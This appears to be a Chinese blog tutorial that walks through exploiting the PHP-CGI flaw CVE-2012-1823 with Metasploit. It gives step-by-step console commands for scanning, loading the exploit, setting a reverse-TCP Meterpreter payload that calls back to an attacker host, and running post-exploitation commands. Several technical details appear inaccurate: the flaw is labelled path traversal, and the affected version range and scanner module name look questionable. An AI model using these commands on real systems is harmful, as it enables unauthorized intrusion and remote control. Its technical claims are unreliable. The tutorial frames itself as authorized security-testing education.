Metasploit漏洞利用系列（八）：MSF渗透测试 - PHPCGI漏洞利用实战

在本系列的第八篇文章中，我们将深入探索如何利用Metasploit Framework (MSF) 来针对PHPCGI (PHP Common Gateway Interface) 的漏洞进行渗透测试。PHPCGI作为一种将Web服务器与PHP脚本交互的方式，其不恰当的配置或老旧版本中可能存在的漏洞常被攻击者利用，以获取服务器权限。本文将通过一个具体案例，展示如何识别并利用PHPCGI的漏洞来实现远程代码执行。

 环境与准备

1. 测试环境：搭建一个运行有PHPCGI的Web服务器，确保其配置或版本存在已知漏洞，如PHP-CGI <= 5.4.45。

2. Metasploit配置：确保Metasploit Framework已安装并更新至最新状态。

3. 信息搜集：使用Nmap等工具初步侦察目标，确认PHPCGI服务的存在及版本信息。

 漏洞识别

首先，利用Metasploit的扫描模块识别目标系统是否运行着易受攻击的PHPCGI服务。

msf6 > use auxiliary/scanner/http/phpcgi_version
msf6 auxiliary(phpcgi_version) > set RHOSTS <target_ip>
msf6 auxiliary(phpcgi_version) > run

 漏洞利用

 选择利用模块

假设目标系统存在CVE-2012-1823漏洞，这是PHP-CGI的一个路径遍历漏洞，可以通过Metasploit的相应模块进行利用。

msf6 > search cve-2012-1823
msf6 > use exploit/unix/webapp/php_cgi_arg_injection

 配置参数

配置利用模块的必要参数，包括攻击载荷、监听地址等。

msf6 exploit(unix/webapp/php_cgi_arg_injection) > set RHOST <target_ip>
msf6 exploit(unix/webapp/php_cgi_arg_injection) > set TARGET 0
msf6 exploit(unix/webapp/php_cgi_arg_injection) > set PAYLOAD php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/php_cgi_arg_injection) > set LHOST <attacker_ip>
msf6 exploit(unix/webapp/php_cgi_arg_injection) > set LPORT 4444

 启动监听器

在Metasploit框架中启动一个监听器，等待来自目标的Meterpreter会话。

msf6 exploit(unix/webapp/php_cgi_arg_injection) > exploit -j

 触发漏洞

漏洞利用模块将尝试通过发送恶意请求到目标的PHPCGI接口，利用路径遍历漏洞执行恶意代码。

 后渗透操作

一旦目标系统响应并执行了恶意代码，攻击者将在Metasploit控制台获得一个Meterpreter会话，可以执行各种后渗透操作，如枚举系统信息、提升权限、数据窃取等。

meterpreter > sysinfo
meterpreter > ipconfig

 结论

通过本次实战演练，我们展示了如何利用Metasploit Framework针对PHPCGI中的漏洞进行渗透测试。这不仅增强了我们对Web服务器安全配置的认识，也警示了维护者及时更新软件和加强安全配置的重要性。请务必在合法授权的环境中进行此类测试，遵守所有相关的法律和伦理标准。